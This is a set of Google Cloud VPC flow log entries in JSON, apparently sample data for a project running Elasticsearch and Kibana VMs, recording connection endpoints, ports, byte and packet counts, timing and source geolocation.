-{"insertId":"1ulp77rfdvho59","jsonPayload":{"bytes_sent":"69440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65263},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"728","reporter":"DEST","rtt_msec":"87","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho57","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":50438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5e","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.0.2.117","dest_port":50438,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho4d","jsonPayload":{"bytes_sent":"2395","connection":{"dest_ip":"192.0.2.165","dest_port":59623,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"11","reporter":"SRC","rtt_msec":"233","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5y","jsonPayload":{"bytes_sent":"60335","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.538257098Z","packets_sent":"353","reporter":"DEST","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho6a","jsonPayload":{"bytes_sent":"65565","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"354","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho4v","jsonPayload":{"bytes_sent":"70174","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65271},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"717","reporter":"DEST","rtt_msec":"89","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"bnj3cofh3cdk1","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":34178},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdjx","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33602},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdju","jsonPayload":{"bytes_sent":"66736","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"366","reporter":"DEST","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdjz","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":33602,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkk","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":52454},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdk0","jsonPayload":{"bytes_sent":"259510","connection":{"dest_ip":"10.87.40.76","dest_port":33534,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"251","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdk8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":52260,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkp","jsonPayload":{"bytes_sent":"65069","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkc","jsonPayload":{"bytes_sent":"60530","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"366","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
-{"insertId":"bnj3cofh3cdkm","jsonPayload":{"bytes_sent":"11384","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"86","reporter":"DEST","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdjy","jsonPayload":{"bytes_sent":"272063","connection":{"dest_ip":"203.0.113.134","dest_port":33554,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565131125Z","packets_sent":"247","reporter":"SRC","rtt_msec":"224","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143837873Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdjv","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"203.0.113.27","dest_port":53706,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"SRC","rtt_msec":"43","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} -{"insertId":"bnj3cofh3cdkh","jsonPayload":{"bytes_sent":"18295","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789039435Z","packets_sent":"118","reporter":"DEST","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork
_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdkg","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33064},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdk7","jsonPayload":{"bytes_sent":"165290","connection":{"dest_ip":"10.87.40.76","dest_port":33556,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"251","reporter":"DEST","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdk9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":53706},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:50.822333871Z","packets_sent":"7","reporter":"DEST","rtt_msec":"43","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:50.703302550Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdkj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":52260},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:11.183868408Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:11.063146265Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdki","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34090,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdkd","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.12","dest_port":34178,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdjw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":33064,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdk3","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":34906},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdkb","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.12","dest_port":58216,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
